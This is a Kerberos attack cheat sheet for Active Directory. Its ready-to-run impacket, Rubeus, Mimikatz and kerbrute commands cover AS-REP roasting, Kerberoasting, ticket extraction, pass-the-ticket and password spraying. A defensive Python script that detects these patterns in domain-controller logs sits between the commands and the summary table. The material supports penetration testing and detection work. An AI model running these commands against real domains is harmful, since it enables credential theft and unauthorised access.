Kerberos Enumeration

1. AS-REP Roasting (No Pre-auth)

Target accounts with "Do not require Kerberos preauthentication" enabled

Tools: GetNPUsers.py, Rubeus

impacket-GetNPUsers infosec.local/ -userfile users.txt -dc-ip <IP> -no-pass
Rubeus.exe asreproast

2. Kerberoasting

Request TGS tickets for SPNs to crack offline

Tools: GetUserSPNs.py, Rubeus

impacket-GetUserSPNs infosec.local/<username>:<password> -dc-ip <IP> -request
Rubeus.exe kerberoast /user:targetuser /domain:infosecwarrior.local /dc:<IP>

3. SPN Enumeration

List Service Principal Names to identify service accounts

Tools: setspn, PowerView

setspn -T infosecwarrior.local -Q */*
Import-Module .\PowerView.ps1
Get-DomainUser -SPN *

4. TGT Extraction

Extract Ticket Granting Tickets (TGT) for later reuse

Tools: Rubeus

Rubeus.exe tgtdeleg

5. Pass-the-Ticket (PTT)

Inject Kerberos tickets into current session

Tools: Rubeus, Mimikatz

Rubeus.exe ptt /ticket:<base64_ticket>
mimikatz # kerberos::ptt ticket.kirbi

6. Password Spraying via Kerberos

Enumerate users and spray passwords over Kerberos

Tool: Kerbrute

kerbrute userenum --dc <IP> -d infosecwarrior.local users.txt
kerbrute passwordspray -d infosecwarrior.local --dc <IP> users.txt password123
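As an added defender-side companion to sections 1, 2 and 6 (example code, not from the original page or from any of the listed tools): a small triage routine run over constructed domain-controller Security events 4768, 4769 and 4771, flagging the log patterns that AS-REP roasting, Kerberoasting and Kerberos password spraying leave behind. The event records, field names and thresholds are assumptions, simplified from the real event schema.

```python
from collections import defaultdict

# Constructed sample records (not real DC logs); fields mirror Security events
# 4768 (TGT request), 4769 (TGS request) and 4771 (pre-auth failure).
EVENTS = [
    {"id": 4768, "user": "svc_legacy", "ip": "10.0.0.50", "preauth": 0, "etype": "0x17"},
    {"id": 4768, "user": "alice", "ip": "10.0.0.51", "preauth": 2, "etype": "0x12"},
    {"id": 4769, "user": "bob", "ip": "10.0.0.52", "service": "MSSQLSvc/db01", "etype": "0x17"},
    {"id": 4769, "user": "bob", "ip": "10.0.0.52", "service": "HTTP/web01", "etype": "0x17"},
    {"id": 4769, "user": "bob", "ip": "10.0.0.52", "service": "CIFS/fs01", "etype": "0x17"},
    {"id": 4769, "user": "carol", "ip": "10.0.0.53", "service": "krbtgt", "etype": "0x12"},
    {"id": 4771, "user": "dave", "ip": "10.0.0.99", "code": "0x18"},
    {"id": 4771, "user": "erin", "ip": "10.0.0.99", "code": "0x18"},
    {"id": 4771, "user": "frank", "ip": "10.0.0.99", "code": "0x18"},
    {"id": 4771, "user": "grace", "ip": "10.0.0.20", "code": "0x18"},
]

RC4 = "0x17"  # RC4-HMAC; roasting tools request it because it cracks fastest


def triage(events, tgs_threshold=3, spray_threshold=3):
    """Return (technique, key, detail) findings for the roasting and spray patterns."""
    findings = []
    tgs_by_client = defaultdict(set)  # (user, ip) -> distinct RC4 service tickets
    fails_by_ip = defaultdict(set)    # ip -> distinct users with a pre-auth failure
    for e in events:
        if e["id"] == 4768 and e["preauth"] == 0:
            # Pre-Authentication Type 0: the account does not require pre-auth,
            # so its AS-REP can be cracked offline (section 1). Review the account.
            findings.append(("asrep_roast", e["user"], f"no pre-auth, etype {e['etype']}"))
        elif e["id"] == 4769 and e["etype"] == RC4 and e["service"] != "krbtgt":
            # One client pulling many RC4 service tickets is the Kerberoasting shape
            # (section 2); krbtgt is excluded because that is a TGT, not an SPN ticket.
            tgs_by_client[(e["user"], e["ip"])].add(e["service"])
        elif e["id"] == 4771 and e["code"] == "0x18":  # KDC_ERR_PREAUTH_FAILED
            # Many different users failing pre-auth from one source looks like a spray
            # (section 6); a single user failing repeatedly is a lockout pattern instead.
            fails_by_ip[e["ip"]].add(e["user"])
    for (user, ip), services in tgs_by_client.items():
        if len(services) >= tgs_threshold:
            findings.append(("kerberoast", f"{user}@{ip}", f"{len(services)} RC4 TGS: {sorted(services)}"))
    for ip, users in fails_by_ip.items():
        if len(users) >= spray_threshold:
            findings.append(("password_spray", ip, f"{len(users)} users failed pre-auth"))
    return findings


if __name__ == "__main__":
    for technique, key, detail in triage(EVENTS):
        print(f"[{technique}] {key}: {detail}")
```

Thresholds are deliberately low for the constructed sample; in production, tune them against a baseline of normal service-ticket and pre-auth failure volume per client.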

Summary Table

Technique          Purpose                            Tools
AS-REP Roasting    Crack user hash w/o pre-auth       GetNPUsers, Rubeus
Kerberoasting      Crack SPN account hash             GetUserSPNs, Rubeus
SPN Enumeration    Identify service accounts          setspn, PowerView
TGT Extraction     Steal valid Kerberos TGT           Rubeus
Pass-the-Ticket    Authenticate using ticket          Rubeus, Mimikatz
Password Spray     Brute-force credentials over KDC   kerbrute
